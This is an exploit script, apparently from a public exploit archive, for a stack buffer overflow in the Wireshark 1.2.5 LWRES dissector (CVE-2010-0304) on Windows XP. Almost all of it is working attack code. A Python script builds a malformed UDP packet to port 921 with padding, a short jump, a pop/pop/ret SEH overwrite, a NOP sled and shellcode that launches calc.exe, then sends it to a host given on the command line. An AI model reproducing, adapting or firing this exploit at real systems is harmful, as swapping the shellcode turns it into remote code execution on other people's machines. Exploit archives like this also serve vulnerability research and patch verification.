# Exploit Title: Wireshark 1.2.5 LWRES getaddrbyname BOF - Calc.exe # Date: 2-14-2010 # Author: Nullthreat and Pure|Hate # Software Link: http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.5.exe # Version: 1.2.5 # Tested on: Windows XP SP2 # CVE : 2010-0304 # OSVDB-ID: 61987 # Code : #!/usr/bin/env python # Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow # Discovered by babi # Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv[1] except: print "usage: " + sys.argv[0] + " " exit(2) port = 921 addr = (host, port) leng = 9150 high = int(leng / 256) low = leng & 255 crash = ("A" * 2128) # Short jump jmp = "\x90\x90\x06\xeb" # pop/pop/ret in pcre3 0x61b4121b ppr = "\x1b\x12\xb4\x61" nop = ("\x90" * 24) # 224 bytes = calc.exe shellcode = ( "\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\xf4\xb1" "\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\xc6\x5c" "\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\xf1\x98" "\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\x3b\xb5" "\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\xa7\xd5" "\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\x3b\x6f" "\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\xb2\xd0" "\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\x8d\x54" "\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\xd8\xb6" "\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\xb9\x77" "\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\x3f\xff" "\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\x5b\x52" "\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\xde\xff" "\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\xd7\xf4" "\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\x20\xff" "\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\xa6\xe5" ) crash2 = ("\xcc" * 6752) data = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01" data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00" data += "\x00\x00\x00\x01" data += chr(high) + chr(low) + crash + jmp + ppr + nop + shellcode + crash2 + "\x00\x00" udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: udps.sendto(data, addr) except: print "can't lookup host" exit(1) udps.close() exit(0)